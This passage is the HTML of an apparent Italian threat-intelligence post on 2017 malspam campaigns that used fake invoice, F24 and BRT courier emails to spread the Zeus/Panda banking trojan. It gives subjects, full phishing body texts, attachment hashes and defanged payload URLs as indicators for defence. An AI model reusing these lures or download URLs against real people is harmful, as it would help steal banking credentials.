&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;pagina1.doc a7960e5a86d7aee713f3c0fcee6c96e4&quot;&gt;&lt;pre class=&quot;language-pagina1.doc a7960e5a86d7aee713f3c0fcee6c96e4&quot;&gt;&lt;code class=&quot;language-pagina1.doc a7960e5a86d7aee713f3c0fcee6c96e4&quot;&gt;pagina 1.doc a7960e5a86d7aee713f3c0fcee6c96e4
pagina 2.doc 5c66df3788a08c83a97a1074006e09e8&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Questi documenti effettuavano il download di una versione di Zeus/Panda dalla seguente risorsa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://cedacriall[.]review/eli.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;La particolarità di questo download è di avvenire abusando un certificato gratuito fornito dall’organizzazione Let’s Encrypt.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 654px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/abc19d64c7f9b758ffcef1948f10901d/68e9c/Pesca1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 26.822916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAA4UlEQVR42jVQy26EMBDj/39rK3WrbfcA4ZkEkkAeQCk5LOWwBK2hqi+ZseyxlYhSWlZVRWnbtn3fG2OEEJidc9baaZq89/M8+xMQSCk7rRUUXRc51z8ey4+fh2Gw1oCUSkJ0eLyHSGscBA+L0VpTyppG1LxGRvR2uSQJud+/brfPj+t7mmVbCNvzGUJY15VznoLKMspY3YjxxPCPqCwLxjkCoSBJgqgQ9m3b9j0svwvK53lBSCqEVEoxdihh608ctY1zquuwfI8j2gkpUE9bCwNenM6LgqQpISSOY8z4iz/zC5RRCxBqsnwAAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/abc19d64c7f9b758ffcef1948f10901d/68e9c/Pesca1.png&quot;
        srcset=&quot;/website/static/abc19d64c7f9b758ffcef1948f10901d/804b2/Pesca1.png 384w,
/website/static/abc19d64c7f9b758ffcef1948f10901d/68e9c/Pesca1.png 654w&quot;
        sizes=&quot;(max-width: 654px) 100vw, 654px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;23/05/2017 - Fattura Maggio e F24&lt;/h3&gt;
&lt;p&gt;La seconda diffusione, descritta in &lt;a href=&quot;https://myonlinesecurity.co.uk/italian-language-zeus-panda-from-macro-word-docs-inside-zips/&quot;&gt;questo articolo su My Online Security&lt;/a&gt;, utilizza due temi differenti nella stessa giornata.&lt;/p&gt;
&lt;h4&gt;Fattura Maggio&lt;/h4&gt;
&lt;p&gt;Il primo tema riguardava una presunta fattura relativa al mese di Maggio, inviava mail con i seguenti oggetti:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;fatt di maggio XXXXXX
richiesta fattura n. XXXXXX
fatt di maggio XXXXXX
Invio fattura XXXXXX
richiesta fattura n. XXXXXX&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Nelle mail si usava poi un contenuto di questo tipo:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Le fatture n. XXXXXX del 23/05/2017 sono in formato WORD per essere visualizzate e stampate. 
Il presente invio SOSTITUISCE INTEGRALMENTE quello effettuato in modo tradizionale a mezzo servizio postale. E’ quindi necessario GENERARNE UNA STAMPA e procedere alla relativa archiviazione come da prassi a norma di legge. La stampa da parte sua dei documenti fa fede ai fini fiscali e contabili.Confidando nel Vostro sollecito riscontro, inviamo i nostri distinti saluti.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In questo caso l’allegato delle mail era il seguente documento Word:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;fattura.05.doc    3fa667c19c7e6cfc41dedba1e282bbd3&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In questo caso sembra sia stato fatto un errore di compilazione del downloader, poiché il file richiedeva la seguente URL errata&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;ehtps://cedsbmurriall[.]info/polo.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Tuttavia sembra che il dominio dovesse essere cedacriall[.]info.&lt;/p&gt;
&lt;h4&gt;F24&lt;/h4&gt;
&lt;p&gt;Il secondo tema riguardava invece il modulo fiscale F24, con i seguenti oggetti&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;pagamento F24
PAGAMENTO f24
copia del pagamento
pagamento2017-05
pagamento del bonifico&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Le mail questa volta sono molto brevi e sintetiche:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Buon pomeriggio,
IN ALLEGATO DELEGA DEL PAGAMENTO F24
Cordiali saluti&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Questa volta l’allegato era il seguente documento Word&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;pagamento F24.doc    d9c79044972d8fe0e857a05b016772f1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Il quale tentava di scaricare sempre una versione di Zeus/Panda dalla seguente risorsa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://cedacriall[.]info/polo.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Anche in questo caso si utilizzava un certificato di Let’s Encrypt&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 908px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/10198c7b236c69b9c0b1e0d3e7b592f5/a2b88/Pesca2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 56.77083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABFklEQVR42o1SXZODIAzs//+N96AdIXyEAMJZrZ69PX2xHR5uZZjIsNlNwo1IWzbMTIi0NmQUua87KcPOOeYgMaacRKKITNP0uOD2ese2bSB0fd91vVLKM1JgY2Otda7U+n1Bg+y910S11uX5nOf5FNkOLO9okdkrIqU1cuecB63IWmRc1/XjclOZB6Wc98g9jgW54JuMQc15HLFSynDUJqO6+zCAAKnHNMWUxlLg4ueCfd/bZChAFs4hUkvRxqSc0fB/2QYZ48GCbRDO3uD8FDwk9xPNUbHnMM8LfjEZTLuUsr8aaJBDELRaHdOKMaJ4TDhIwI52BBEEjEsSP8nwWUrFhzrxImCejEWrQfjLqDUCvAIcisRfXIx4nxl7D5oAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/10198c7b236c69b9c0b1e0d3e7b592f5/a2b88/Pesca2.png&quot;
        srcset=&quot;/website/static/10198c7b236c69b9c0b1e0d3e7b592f5/804b2/Pesca2.png 384w,
/website/static/10198c7b236c69b9c0b1e0d3e7b592f5/e5715/Pesca2.png 768w,
/website/static/10198c7b236c69b9c0b1e0d3e7b592f5/a2b88/Pesca2.png 908w&quot;
        sizes=&quot;(max-width: 908px) 100vw, 908px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;15/06/17 - Fattura proforma&lt;/h3&gt;
&lt;p&gt;La terza diffusione, descritta in &lt;a href=&quot;https://myonlinesecurity.co.uk/italian-language-fake-invoice-delivers-zeus-panda-banking-trojan/&quot;&gt;questo articolo su My Online Security&lt;/a&gt;, utilizzava i seguenti oggetti:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;fattura
fattura corretta
Fattura n.06/17
fattura insoluta
fattura nuovo iban!&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ancora una volta le mail arrivano con un testo molto semplice e ben scritto:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Buongiorno
ti invio in allegato la fattura proforma. Aggiornami quanto prima.
Grazie&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Questa volta cambia il formato del downloader, viene usato un file Excel:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Fattura n.XXXXX del 15-07-2017.xls    a05ecf6f1cd0ae183bc8514efb801a65&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Che tentava di scaricare ancora una volta Zeus/Panda dalla seguente risorsa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://cedacriall[.]review/1ulxomeobigohiwhufovi.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lo stesso sito e lo stesso certificato visti nella campagna prima campagna di Aprile.&lt;/p&gt;
&lt;p&gt;##20/06/17 - Fattura BRT&lt;/p&gt;
&lt;p&gt;La quarta diffusione finge di essere una richiesta di fatturazione di un corriere italiano. In questo caso viene utilizzato un unico formato per l’oggetto in tutte le mail:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Fattura BRT S.p.A. n. XXXXXX del 20/06/17&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In questo caso vediamo una mail un po’ più elaborata, in modo da ricordare le vere mail della compagnia:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Gentile cliente,
come da sua richiesta le inviamo in allegato la fattura in oggetto in formato xls.
Sarà vostra cura la stampa su supporto cartaceo (risoluzione del 04/07/2001 n. 107).
Cordiali saluti
BRT S.p.A.
Il presente messaggio è diretto esclusivamente al suo destinatario e può; contenere informazioni di natura riservata. Chiunque lo abbia ricevuto per errore è pregato di darne notizia immediatamente al mittente e di distruggere la copia pervenutagli. Qualsiasi altro suo utilizzo è vietato.
This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original Any other use of the email by you is prohibited.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;L’allegato è nuovamente un file Excel, in due versioni:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Fattura_XXXXXX.xls 7c09d53a7929c3bdb3dd418c6e3161f6
3D fattura XXXXXX.xls 4fdeccecfa0fe4532a569e2060be74d5&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Il payload finale della prima versione risulta sempre essere una variante di Zeus/Panda, reperito dalla seguente risorsa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://cedacriall[.]win/1aqalpiniahelfuimoksa.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ancora una volta vediamo l’uso di un certificato Let’s Encrypt&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 503px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9432f4192c1a04a252c0aba8765202a0/a4078/Pesca3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 26.302083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAA3klEQVR42iWQyW7CMBRF8/9fxKbdUCTi2dhGohCJJKTEU1pASbe9qSXLeno6d7ArrZIQiVJPaWAsKJW0TtZmLiKWjHkMUkYh421YLpentdPp8yFVappHdThkzsMK8SDAqWRM1joXl7I8um/MbTvDHXzfzR/b4Xz+qeAk5JpMiAdnzOTshBt1lFrDOQuwo8x33bzbfRESmua52Vyty5Vz4CIh437vKWprxCZjJ1SVIhRxyR9uy/tbVxOP8pT4a/sqtSOjviYjOOghxsEAoq7Hf2XA0PcLPggwxHjX/f77B/Pv/wBrUHIKAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9432f4192c1a04a252c0aba8765202a0/a4078/Pesca3.png&quot;
        srcset=&quot;/website/static/9432f4192c1a04a252c0aba8765202a0/804b2/Pesca3.png 384w,
/website/static/9432f4192c1a04a252c0aba8765202a0/a4078/Pesca3.png 503w&quot;
        sizes=&quot;(max-width: 503px) 100vw, 503px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Mentre il secondo downloader recupera lo stesso malware dalla seguente risorsa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://cedacriall[.]faith/1aqalpiniahelfuimoksa.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In questo caso però lo spammer non ha creato un certificato ad hoc per il dominio, che risponde con lo stesso certificato del primo sample:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 848px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/655d9caa76fedfae690932076eb57aa8/d52e5/Pesca4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.40625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABTklEQVR42o2S23aCMBRE/f8v7IuiuZAAiSE3uQSkY7Bdpc1DN6wQ1MmZM8fT+Xy+VFXTtKDOUEqllJwxbNrmzb4RR06E3qQSSinGeY27UR8XdmX5p1Lq+xul9d2Yx5HTtm3P7bmzrqsx5nojVXUlhHZvVKcUnCmlhyMv8TfQQwz/IYQxM2XmeU7zPI1jofJPMbzVQrRd50NIaYHt3lqIccT2h0JlyjmhFKeEEF9BCEERHmOPx4AjxgHXmJbltxigxRuhsm2XjPM+xGidwwqf6DP7HVJKhcrW2k5rZOucg1udQ4YS/f/LNowSypDwNE7WoapDfrCAb7evuZTFSAjjjTHOGXSB8IplC2LvPYo759Ewxo7MY/a8ZvYP9xUUepZNw+savcIwNkJIxvgeOyEED7zmcaqDGIchU9TyOWT8RdCFMT1uPPYVGfR9nwcZPgHc+OgSLSO4TwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/655d9caa76fedfae690932076eb57aa8/d52e5/Pesca4.png&quot;
        srcset=&quot;/website/static/655d9caa76fedfae690932076eb57aa8/804b2/Pesca4.png 384w,
/website/static/655d9caa76fedfae690932076eb57aa8/e5715/Pesca4.png 768w,
/website/static/655d9caa76fedfae690932076eb57aa8/d52e5/Pesca4.png 848w&quot;
        sizes=&quot;(max-width: 848px) 100vw, 848px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;C21/06/2017 - Fattura CSA&lt;/h2&gt;
&lt;p&gt;La quinta campagna registrata utilizza nuovamente una dichiarazione generica di fattura&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;fatt n. XX del 21 giugno 2017
f-ra n. XX del 21 giugno 2017
fattura n. XX del 21 giugno 2017&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Le mail sono estremamente semplici e brevi&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Buongiorno, allego alla presente la fattura in oggetto cordiali saluti&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Nuovamente viene utilizzato un downloader Excel&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;2017 - fatt. XX.xls dbb09aa8e0131b3c246f893705318254
fatt. - 2017 n.XX.xls b7995a448008cb5ed570c4ad96f97b56&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Il payload finale risulta sempre essere una variante di Zeus/Panda, reperito dalla seguente risorsa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://cedacriall[.]download/index.gif&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 846px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/47f77b427049357b4ac6189bf62f7590/5b481/Pesca5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.4375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAtklEQVR42m2OyQ6DMAxE+f8fg95LEjAhK5CliEqcaTtBqoSqzsFxbI+fK6JBSumct84NcpimaVmWGOOjKK/rmlLEgDFmVGqeZ1RyzuiFECp88GDan0J12zYk2AVpY9AtmfcI2Ju+gqW6t6yp61vTtC17F72O48BQy5joOnhAuxquqnACuDmlk/nc9x3kGIOUIxeiJ2KM9zSA/8eMC0NYnLWAWGvBxKlKKyICnHNeosCeTmv9Y/4ARMsMXldZZOAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/47f77b427049357b4ac6189bf62f7590/5b481/Pesca5.png&quot;
        srcset=&quot;/website/static/47f77b427049357b4ac6189bf62f7590/804b2/Pesca5.png 384w,
/website/static/47f77b427049357b4ac6189bf62f7590/e5715/Pesca5.png 768w,
/website/static/47f77b427049357b4ac6189bf62f7590/5b481/Pesca5.png 846w&quot;
        sizes=&quot;(max-width: 846px) 100vw, 846px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;22/06/2017 - Fattura del 22/06&lt;/h2&gt;
&lt;p&gt;Abbiamo inoltre rilevato una sesta campagna, che utilizza ancora la dicitura generica di fattura&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Invio Fattura
Fattura del 22/06/17
Fattura XXX del 22/06/17
Fattura numero XXX del 22/06/2017&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Il testo delle mail è ancora molto semplice e breve&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Alleghiamo fattura in formato XLS.
Ufficio Amministrazione&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Il vettore d’infezione è ancora un file Excel&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;3D FATT-06-2017-689.xls 8b1436cca913772d6ec53deb3e2aecba&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Tuttavia questa volta il dominio sembra pseudo casuale, anche se la struttura dell’URL è molto simile alle precedenti&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps://3eee22abda47[.]bid/index.frt&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;E viene ancora utilizzato un certificato Let’s Encrypt&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 903px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/cb9c0a4d19aa03aace856bd96a38321b/c4b7c/Pesca6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.71875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABNUlEQVR42oVSa2+DMBDr//+FUyuVjhC4vMgB4RVYO5Nq2qjQavEhp8TYvrvT+XK+fWZEJGWRZTchRC6Kj8tVyDLLsrIsjTH6B2qPk9KqZue9T3fas5ekr3mVl0SKNihtjMXTqqJhGOL8i9Njj2VZmP1TwmjTtl2b0CR0e7yS13WFEORwFyNkpjHhK2Hd44CMkBJZKwp9z00jioLgwtg5xpfHB2RrbSFLbbfX0DeorUPy2nuUiNB1YZymYzLSikJa53Aex8kzhxDQKti+/8E/yvKW56B1IVSKmrZl5rgs721jZqSN9zzPEa2C2xD6Ncm+IadRMTdtTO2BW5CREp5RJrvb93jcj8lYGLSnIoVuO+e2yWF7sCTbFsrnIHFAUw7IzwVAzn7YAP/JSoOf1qmoPbu67ofhG11jr8WSIf/SAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/cb9c0a4d19aa03aace856bd96a38321b/c4b7c/Pesca6.png&quot;
        srcset=&quot;/website/static/cb9c0a4d19aa03aace856bd96a38321b/804b2/Pesca6.png 384w,
/website/static/cb9c0a4d19aa03aace856bd96a38321b/e5715/Pesca6.png 768w,
/website/static/cb9c0a4d19aa03aace856bd96a38321b/c4b7c/Pesca6.png 903w&quot;
        sizes=&quot;(max-width: 903px) 100vw, 903px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Anche se potrebbe sembrare scollegata, questa campagna pare essere comunque legata alle precedenti, infatti il server è lo stesso della campagna del 21/06. Infatti richiedendo la medesima URI al dominio utilizzato in tale campagna otteniamo lo stesso file.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 963px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/7e20b114d5255f40c08725fb51e741b9/e4a12/Pesca7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 60.9375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABX0lEQVR42oWS226DMBBE+f//ynPTvlWVkibEGHwBjA0GhZAeu+pD76No2Zid2d0xhRCiLC9SyqZp6romkqumUarRWklZvyacwPlc8jwcjhQYY7TWxel8KsWZYpjkRK3Ny7F8PpSlqNClyGSQdF3n/eBc/47i6RHs9w8Pu90uxrht2ziOypiLqERVGWuhWdsSlNY+hGVZ5g8U6DG5zEAYVarJKymHYUBonFJYMqYp/+EsI5HZk8jAKkHn/euLEIyLfLJBKdu2VN8/o9g+cMvgCGFoKNEZctt1MCVeGMPY3nvH+bIk8v0b6EApvzBOyIUQkMOO6/W63WiS2tDsV7LSBreYnpyZcazr+zjPX8f+kWys6bo++HBbV8yJcc47bf+TmZD1eufWFe7KwribXmRr0vPvztZarirTAmYLUdXJhSbfBfbzBTYtH8mPZCzC1cH7OUbnHIazM/Hd+d4N+ebiGy3tqd3RQSrCAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca7&quot;
